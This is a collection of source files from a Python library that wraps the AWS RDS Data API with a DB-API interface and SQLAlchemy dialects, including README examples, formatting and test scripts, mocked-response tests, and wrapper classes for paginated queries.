{'name': 'dog'}))\n        # you can rollback by Exception\n        raise Exception\n\n\ndef 
example_rollback_with_custom_exception():\n class OriginalError(Exception):\n pass\n\n with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn, rollback_exception=OriginalError) as data_api:\n\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n # some logic ...\n\n # rollback when happen `rollback_exception`\n raise OriginalError # rollback\n\n # raise Exception <- DataAPI don't rollback\n\ndef example_driver_for_sqlalchemy():\n from sqlalchemy.engine import create_engine\n engine = create_engine(\n 'mysql+pydataapi://',\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test'}\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n print(result.fetchall())\n\n```\n\n## Contributing to pydataapi\nWe are waiting for your contributions to `pydataapi`.\n\n### How to contribute\n[https://koxudaxi.github.io/py-data-api/contributing](https://koxudaxi.github.io/py-data-api/contributing)\n\n\n## Related projects\n### local-data-api\n\nDataAPI Server for local \n\nhttps://github.com/koxudaxi/local-data-api\n\n## PyPi \n\n[https://pypi.org/project/pydataapi](https://pypi.org/project/pydataapi)\n\n## Source Code\n\n[https://github.com/koxudaxi/py-data-api](https://github.com/koxudaxi/py-data-api)\n\n## Documentation\n\n[https://koxudaxi.github.io/py-data-api](https://koxudaxi.github.io/py-data-api)\n\n## License\n\npy-data-api is released under the MIT License. http://www.opensource.org/licenses/mit-license\n" }, { "alpha_fraction": 0.7256097793579102, "alphanum_fraction": 0.7439024448394775, "avg_line_length": 31.799999237060547, "blob_id": "1d01a9568f9ade13f2802e9b4e112d7f0adeae11", "content_id": "71a772dc71d29063aaee69189871d21e7d7c6311", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 164, "license_type": "permissive", "max_line_length": 85, "num_lines": 5, "path": "/scripts/format.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nblack pydataapi tests --skip-string-normalization\nisort --recursive -w 88 --combine-as --thirdparty pydataapi pydataapi tests -m 3 -tc\n" }, { "alpha_fraction": 0.34559985995292664, "alphanum_fraction": 0.3635644316673279, "avg_line_length": 33.80991744995117, "blob_id": "bec7d4799422fc54f9dd4b2d1a1d003f7ae683c8", "content_id": "015a60e878aea2db8da9e7fac6284dc529e3858f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12636, "license_type": "permissive", "max_line_length": 126, "num_lines": 363, "path": "/tests/pydataapi/test_dialect.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import pytest\nfrom sqlalchemy.engine import ResultProxy\n\n\[email protected]\ndef mocked_client(mocker):\n return mocker.patch('boto3.client')\n\n\ndef test_mysql(mocked_client) -> None:\n from sqlalchemy.engine import create_engine\n\n mocked_client.begin_transaction.return_value = {'transactionId': 'abc'}\n mocked_client.execute_statement.side_effect = [\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Variable_name',\n 'name': 'VARIABLE_NAME',\n 'nullable': 0,\n 'precision': 256,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n {\n 'arrayBaseColumnType': 0,\n 
'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Value',\n 'name': 'VARIABLE_VALUE',\n 'nullable': 1,\n 'precision': 4096,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [\n [\n {'stringValue': 'sql_mode'},\n {\n 'stringValue': 'IGNORE_SPACE,STRICT_TRANS_TABLES,NO_ENGINE_SUBSTITUTION'\n },\n ]\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Variable_name',\n 'name': 'VARIABLE_NAME',\n 'nullable': 0,\n 'precision': 256,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Value',\n 'name': 'VARIABLE_VALUE',\n 'nullable': 1,\n 'precision': 4096,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [\n [{'stringValue': 'lower_case_table_names'}, {'stringValue': '0'}]\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'VERSION()',\n 'name': 'VERSION()',\n 'nullable': 0,\n 'precision': 24,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': '5.6.45'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'DATABASE()',\n 'name': 'DATABASE()',\n 'nullable': 1,\n 'precision': 136,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'test'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': '@@tx_isolation',\n 'name': '@@tx_isolation',\n 'nullable': 1,\n 'precision': 60,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'REPEATABLE-READ'}]],\n },\n {'records': [[{'stringValue': 'test plain returns'}]]},\n {'records': [[{'stringValue': 'test unicode returns'}]]},\n {\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'longValue': 1}, {'stringValue': 'cat'}]],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": True,\n \"label\": \"id\",\n \"name\": \"id\",\n \"nullable\": 1,\n \"precision\": 11,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 4,\n \"typeName\": \"INT\",\n },\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": \"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n },\n ],\n },\n ]\n engine = create_engine(\n 'mysql+pydataapi://',\n echo=True,\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 
'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test',\n 'client': mocked_client,\n },\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n assert result.fetchall() == [(1, 'cat')]\n\n\ndef test_postgresql(mocked_client) -> None:\n from sqlalchemy.engine import create_engine\n\n mocked_client.begin_transaction.return_value = {'transactionId': 'abc'}\n\n mocked_client.execute_statement.side_effect = [\n {\n 'records': [\n [\n {\n 'stringValue': 'PostgreSQL 10.7 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.0) 8.3.0, 64-bit'\n }\n ]\n ],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": \"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n }\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'current_schema',\n 'name': 'current_schema',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'name',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'public'}]],\n },\n {'records': [[{'stringValue': 'test plain returns'}]]},\n {'records': [[{'stringValue': 'test unicode returns'}]]},\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'transaction_isolation',\n 'name': 'transaction_isolation',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'text',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'read committed'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': True,\n 'isCurrency': False,\n 'isSigned': False,\n 'label': 'standard_conforming_strings',\n 'name': 'standard_conforming_strings',\n 'nullable': 2,\n 'precision': 2147483647,\n 'scale': 0,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'text',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'on'}]],\n },\n {\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'longValue': 1}, {'stringValue': 'cat'}]],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": True,\n \"label\": \"id\",\n \"name\": \"id\",\n \"nullable\": 1,\n \"precision\": 11,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 4,\n \"typeName\": \"INT\",\n },\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": \"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n },\n ],\n },\n ]\n engine = create_engine(\n 'postgresql+pydataapi://',\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test',\n 'client': mocked_client,\n },\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n assert 
result.fetchall() == [(1, 'cat')]\n" }, { "alpha_fraction": 0.7256097793579102, "alphanum_fraction": 0.7439024448394775, "avg_line_length": 31.799999237060547, "blob_id": "1d01a9568f9ade13f2802e9b4e112d7f0adeae11", "content_id": "71a772dc71d29063aaee69189871d21e7d7c6311", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 164, "license_type": "permissive", "max_line_length": 85, "num_lines": 5, "path": "/scripts/format.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nblack pydataapi tests --skip-string-normalization\nisort --recursive -w 88 --combine-as --thirdparty pydataapi pydataapi tests -m 3 -tc\n" }, { "alpha_fraction": 0.7459677457809448, "alphanum_fraction": 0.7580645084381104, "avg_line_length": 40.5, "blob_id": "9d694a461c2534ceca33c49888aa593334da6357", "content_id": "a278e5116fe2a2bf8b6383485b289983031ab8f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "permissive", "max_line_length": 98, "num_lines": 6, "path": "/scripts/lint.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nblack pydataapi tests --check --skip-string-normalization\nisort --recursive --check-only -w 88 --combine-as --thirdparty pydataapi pydataapi tests -m 3 -tc\nmypy pydataapi --disallow-untyped-defs --ignore-missing-imports" }, { "alpha_fraction": 0.7760617733001709, "alphanum_fraction": 0.7799227833747864, "avg_line_length": 42.33333206176758, "blob_id": "a2c8f3f2e8e81e82678b1f30df47d63c0166b7a9", "content_id": "2c8e1e85ab3e3314ee43bec2866d3b811388b48a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 259, "license_type": "permissive", "max_line_length": 131, "num_lines": 6, "path": "/scripts/test.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nexport AWS_DEFAULT_REGION=us-west-2\npytest --cov=pydataapi --ignore-glob=tests/integration/** tests\npytest --docker-compose-no-build --use-running-containers --docker-compose=tests/integration/docker-compose.yml tests/integration/" }, { "alpha_fraction": 0.5216178297996521, "alphanum_fraction": 0.5244072675704956, "avg_line_length": 39.97142791748047, "blob_id": "e80d5aee39eae7d12dc63ed29879d7239f44c39b", "content_id": "eb02206d72300250d1a5565c2369a2ae41d3dc53", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2868, "license_type": "permissive", "max_line_length": 79, "num_lines": 70, "path": "/pydataapi/WrappedDataAPI.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import boto3\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy import func\nfrom pydataapi import Result, DataAPI\nfrom typing import (\n    Any,\n    Dict,\n    Optional,\n    Type,\n    Union,\n)\nfrom sqlalchemy.sql import Insert, Delete, Select, Update\nfrom WrappedResult import WrappedResult\n\n\nclass WrappedDataAPI(DataAPI):\n\n    def __init__(self,\n                 *,\n                 secret_arn: str,\n                 resource_arn: Optional[str] = None,\n                 resource_name: Optional[str] = None,\n                 database: Optional[str] = None,\n                 transaction_id: Optional[str] = None,\n                 client: Optional[boto3.session.Session.client] = None,\n                 rollback_exception: Optional[Type[Exception]] = None,\n                 rds_client: Optional[boto3.session.Session.client] = None,):\n\n        super().__init__(secret_arn=secret_arn, resource_arn=resource_arn,\n                         resource_name=resource_name, database=database,\n                         transaction_id=transaction_id, client=client,\n                         rollback_exception=rollback_exception,\n                         rds_client=rds_client)\n\n    def _get_start_end(self, end, start=0, limit=999):\n        while True:\n            if start + limit >= end:\n                yield (start, end)\n                break\n            tmp_end = start + limit\n            yield (start, tmp_end)\n            start = tmp_end  # next slice starts where this one stopped; slice() is half-open\n\n    def execute(self,\n                query: Union[Query, Insert, Update, Delete, Select, str],\n                parameters: Optional[Dict[str, Any]] = None,\n                transaction_id: Optional[str] = None,\n                continue_after_timeout: bool = True,\n                database: Optional[str] = None,\n                ) -> WrappedResult:\n        if isinstance(query, (Query, 
Select)):\n qCount: Query = query.statement.with_only_columns([func.count()])\\\n .order_by(None)\n result: Result = super().execute(qCount)\n query_total: int = result.scalar()\n final_result = list()\n for start, end in self._get_start_end(query_total):\n sliceQuery: Query = query.slice(start, end)\n result: Result = super().execute(sliceQuery, parameters,\n transaction_id,\n continue_after_timeout,\n database)\n final_result.append(result)\n wResult: WrappedResult = WrappedResult(final_result)\n else:\n result: Result = super().execute(query, parameters, transaction_id,\n continue_after_timeout, database)\n wResult: WrappedResult = WrappedResult([result])\n return wResult\n" }, { "alpha_fraction": 0.5843662023544312, "alphanum_fraction": 0.5865146517753601, "avg_line_length": 28.37378692626953, "blob_id": "50c7f27fd22aca2f28fe48344d7152fc507d0a97", "content_id": "2ae62a166af6579f567a8f7df39cb7ddfd62df23", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6051, "license_type": "permissive", "max_line_length": 86, "num_lines": 206, "path": "/pydataapi/dbapi.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from typing import Any, Dict, Iterator, List, Optional, Tuple, Type\n\nimport boto3\nfrom pydantic import BaseModel\n\nfrom .pydataapi import DataAPI\n\napilevel: str = '2.0'\nthreadsafety: int = 2\nparamstyle: str = 'named'\n\n\ndef get_description(column_metadata: List[Dict[str, Any]]) -> Tuple:\n return tuple(\n (\n meta['label'], # name\n 0, # type_code,\n 0, # display_size,\n 0, # internal_size,\n meta['precision'], # precision,\n meta['scale'], # scale,\n meta['nullable'],\n )\n for meta in column_metadata\n )\n\n\nclass Error(Exception):\n pass\n\n\nclass ConnectArgs(BaseModel):\n secret_arn: str\n resource_arn: Optional[str]\n resource_name: Optional[str]\n database: Optional[str] = None\n transaction_id: Optional[str] = None\n client: Optional[Any] = None\n rollback_exception: Optional[Type[Exception]] = None\n rds_client: Optional[Any] = None\n\n\nclass Connection:\n paramstyle = paramstyle\n Error = Error\n\n def __init__(self, **kwargs: Any) -> None:\n connect_args = ConnectArgs.parse_obj(kwargs)\n self._data_api = DataAPI(\n secret_arn=connect_args.secret_arn,\n resource_arn=connect_args.resource_arn,\n resource_name=connect_args.resource_name,\n database=connect_args.database,\n transaction_id=connect_args.transaction_id,\n client=connect_args.client,\n rollback_exception=connect_args.rollback_exception,\n rds_client=connect_args.rds_client,\n )\n\n self.closed = False\n self.cursors: List[Cursor] = []\n\n def close(self) -> None:\n self.closed = True\n\n def commit(self) -> None:\n if self._data_api.transaction_id:\n self._data_api.commit()\n self._data_api._transaction_id = None\n\n def rollback(self) -> None:\n if self._data_api.transaction_id:\n self._data_api.rollback()\n self._data_api._transaction_id = None\n\n def cursor(self) -> 'Cursor':\n if not self._data_api.transaction_id:\n self._data_api.begin()\n cursor = Cursor(self._data_api)\n self.cursors.append(cursor)\n\n return cursor\n\n @classmethod\n def connect(cls, **kwargs: Any) -> 'Connection':\n return cls(**kwargs)\n\n def execute(self, operation: Any, parameters: Any = None) -> 'Cursor':\n return self.cursor().execute(operation, parameters)\n\n def __enter__(self) -> 'Connection':\n self._data_api.begin()\n return self\n\n def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:\n if exc_type is None:\n 
self.commit()\n else:\n if self._data_api.rollback_exception:\n if issubclass(exc_type, self._data_api.rollback_exception):\n self.rollback()\n else:\n self.commit()\n else:\n self.rollback()\n\n\nclass Cursor:\n def __init__(self, data_api: DataAPI) -> None:\n self._data_api: DataAPI = data_api\n self.arraysize = 1\n\n self.closed = False\n\n self.description: Optional[List] = None\n\n self._rows: List[List] = []\n self._rowcount: int = -1\n self._lastrowid: Optional[int] = None\n\n @property\n def rowcount(self) -> int:\n return self._rowcount\n\n @property\n def lastrowid(self) -> Optional[int]:\n return self._lastrowid\n\n def close(self) -> None:\n self.closed = True\n\n def execute(\n self, operation: Any, parameters: Optional[Dict[str, Any]] = None\n ) -> 'Cursor':\n self.description = None\n result = self._data_api.execute(operation, parameters)\n self.description = get_description( # type: ignore\n getattr(result, '_column_metadata')\n )\n rows: List[List] = getattr(result, '_rows')\n self._rows = rows\n self._rowcount = len(rows) or result.number_of_records_updated\n self._lastrowid = result.generated_fields_first # type: ignore\n return self\n\n def executemany(\n self, operation: Any, seq_of_parameters: Optional[List[Dict[str, Any]]] = None\n ) -> 'Cursor':\n self.description = None\n results = self._data_api.batch_execute(operation, seq_of_parameters)\n self._rows = [result.generated_fields for result in results]\n self._rowcount = len(self._rows)\n self.description = []\n self._lastrowid = ( # type: ignore\n results[-1].generated_fields_first if results else None # type: ignore\n )\n return self\n\n def fetchone(self) -> Optional[List]:\n try:\n return self._rows.pop(0)\n except IndexError:\n return None\n\n def fetchmany(self, size: Optional[int] = None) -> List[List]:\n size = size or self.arraysize\n result, self._rows = self._rows[:size], self._rows[size:]\n return result\n\n def fetchall(self) -> List[List]:\n rows = self._rows\n self._rows = []\n return rows\n\n def setinputsizes(self, sizes: Any) -> None: # pragma: no cover\n pass\n\n def setoutputsizes(self, sizes: Any) -> None: # pragma: no cover\n pass\n\n def __iter__(self) -> Iterator[List]:\n return iter(self._rows)\n\n\ndef connect(\n secret_arn: str,\n resource_arn: Optional[str] = None,\n resource_name: Optional[str] = None,\n database: Optional[str] = None,\n transaction_id: Optional[str] = None,\n client: Optional[boto3.session.Session.client] = None,\n rollback_exception: Optional[Type[Exception]] = None,\n rds_client: Optional[boto3.session.Session.client] = None,\n **kwargs: Any\n) -> Connection:\n return Connection(\n secret_arn=secret_arn,\n resource_arn=resource_arn,\n resource_name=resource_name,\n database=database,\n transaction_id=transaction_id,\n client=client,\n rollback_exception=rollback_exception,\n rds_client=rds_client,\n **kwargs\n )\n" }, { "alpha_fraction": 0.6093396544456482, "alphanum_fraction": 0.6107797026634216, "avg_line_length": 26.15642547607422, "blob_id": "8d62005546bcdcba850da68acff7f7855cf6f29a", "content_id": "0f54f4266b5e82e4e6cbf61e0ba141f0f2c3948b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4861, "license_type": "permissive", "max_line_length": 88, "num_lines": 179, "path": "/pydataapi/dialect.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from abc import ABC\nfrom typing import Any, Type\n\nfrom pydataapi.dbapi import Connection\nfrom sqlalchemy.dialects.mysql.base import 
(\n MySQLCompiler,\n MySQLDDLCompiler,\n MySQLDialect,\n MySQLIdentifierPreparer,\n MySQLTypeCompiler,\n)\nfrom sqlalchemy.dialects.postgresql.base import (\n PGCompiler,\n PGDDLCompiler,\n PGDialect,\n PGIdentifierPreparer,\n PGInspector,\n PGTypeCompiler,\n)\nfrom sqlalchemy.engine.default import DefaultDialect\n\n\nclass DataAPIDialect(DefaultDialect, ABC):\n driver: str = 'dataapi'\n supports_alter = True\n\n supports_native_boolean = True\n\n max_identifier_length = 255\n max_index_name_length = 64\n\n supports_native_enum = False\n\n supports_sane_rowcount = True\n supports_sane_multi_rowcount = False\n supports_multivalues_insert = True\n\n supports_comments = True\n inline_comments = True\n\n cte_follows_insert = True\n\n _backslash_escapes = True\n _server_ansiquotes = False\n\n @classmethod\n def dbapi(cls) -> Type[Connection]:\n return Connection\n\n def get_columns(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_primary_keys(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_foreign_keys(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_table_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_temp_table_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_view_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_temp_view_names(\n self, connection: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_view_definition(\n self, connection: Any, view_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_indexes(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_unique_constraints(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_check_constraints(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_table_comment(\n self, connection: Any, table_name: Any, schema: Any = None, **kw: Any\n ) -> None: # pragma: no cover\n pass\n\n def normalize_name(self, name: Any) -> None: # pragma: no cover\n pass\n\n def denormalize_name(self, name: Any) -> None: # pragma: no cover\n pass\n\n def has_table(\n self, connection: Any, table_name: Any, schema: Any = None\n ) -> None: # pragma: no cover\n pass\n\n def has_sequence(\n self, connection: Any, sequence_name: Any, schema: Any = None\n ) -> None: # pragma: no cover\n pass\n\n def _get_server_version_info(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def _get_default_schema_name(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def do_begin_twophase(self, connection: Any, xid: Any) -> None: # pragma: no cover\n pass\n\n def do_prepare_twophase(\n self, connection: Any, xid: Any\n ) -> None: # pragma: no cover\n pass\n\n def do_rollback_twophase(\n self, connection: Any, xid: Any, is_prepared: bool = True, recover: bool = False\n ) -> None: # pragma: no cover\n pass\n\n def do_commit_twophase(\n self, connection: Any, xid: Any, is_prepared: bool = True, recover: bool = False\n ) -> None: # pragma: no cover\n pass\n\n def 
do_recover_twophase(self, connection: Any) -> None: # pragma: no cover\n pass\n\n def set_isolation_level(\n self, dbapi_conn: Any, level: Any\n ) -> None: # pragma: no cover\n pass\n\n def get_isolation_level(self, dbapi_conn: Any) -> None: # pragma: no cover\n pass\n\n\nclass MySQLDataAPIDialect(MySQLDialect, DataAPIDialect):\n def _extract_error_code(self, exception: Exception) -> Any: # pragma: no cover\n pass\n\n def _detect_charset(self, connection: Any) -> Any: # pragma: no cover\n pass\n\n name = \"mysql\"\n default_paramstyle = \"named\"\n\n\nclass PostgreSQLDataAPIDialect(PGDialect, DataAPIDialect):\n name = \"postgresql\"\n default_paramstyle = \"named\"\n supports_alter = True\n max_identifier_length = 63\n supports_sane_rowcount = True\n isolation_level = None\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.5710325837135315, "avg_line_length": 34.19512176513672, "blob_id": "06e27425dafeadaab40410514a181ee6d452d0b8", "content_id": "4f8fc79b89e3440732a3a9ff857450b82d20d854", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "permissive", "max_line_length": 79, "num_lines": 41, "path": "/pydataapi/WrappedResult.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "from pydataapi import Result\nfrom typing import (\n Any,\n Dict,\n List,\n Optional,\n Sequence,\n)\n\n\nclass WrappedResult(Result):\n def __init__(self, result_list: Sequence[Result], isSelect=False):\n self._number_of_records_updated = 0\n self._column_metadata: List[Dict[str, Any]] = list()\n self._rows = list()\n self._index: int = -1\n self._headers: Optional[List[str]] = None\n self.generatedFields: List[Any] = list()\n self.last_generatedFields: Any = 0\n for result in result_list:\n self._rows += result._rows\n self._column_metadata += result._column_metadata\n self._number_of_records_updated += result.number_of_records_updated\n if \"generatedFields\" in result._response and len(\n result._response[\"generatedFields\"]) > 0:\n self.generatedFields.append(\n [list(f.values())[0] for f in\n result._response[\"generatedFields\"]][0]\n )\n self.last_generatedFields = self.generatedFields[-1]\n if len(result_list) > 0:\n self._headers = result_list[0].headers\n self._response = result_list[0].headers\n\n @property\n def number_of_records_updated(self) -> int:\n return self._number_of_records_updated\n\n @property\n def headers(self) -> List[str]:\n return self._headers\n" } ]
10
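A minimal usage sketch for the DB-API layer that closes the record above. The two ARNs are placeholders, the table/column names are invented for illustration, and `cursor()` is assumed to be the standard DB-API factory on `Connection` (only `connect()`, `commit()`/`rollback()`, and the `Cursor` methods are confirmed by the code shown):

```python
# Sketch only: assumes the pydataapi package is installed and the ARNs
# point at a real Aurora Serverless cluster and its Secrets Manager secret.
from pydataapi.dbapi import connect

conn = connect(
    secret_arn="arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy",  # placeholder
    resource_arn="arn:aws:rds:us-east-1:123456789012:cluster:dummy",          # placeholder
    database="test",
)
cur = conn.cursor()  # assumed: standard DB-API cursor() factory on Connection
cur.execute("SELECT id, name FROM pets WHERE id = :id", {"id": 1})  # named paramstyle
print(cur.fetchone())   # pops the first row, or None when empty
print(cur.fetchall())   # drains whatever rows remain
cur.close()
conn.commit()           # commit()/rollback() are confirmed by __exit__ above
```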
WangMingJue/LeetCode
https://github.com/WangMingJue/LeetCode
279400aeca4cec6f93c24c99104040c9d6f11180
63332f39c0651fb5b1ab1e3bb8289f7ea857a10a
e7dfaca90f297fa7007290346d0278237c6cfa9e
refs/heads/main
2023-05-09T21:42:22.167311
2021-05-21T08:01:53
2021-05-21T08:01:53
369,459,261
0
0
null
null
null
null
null
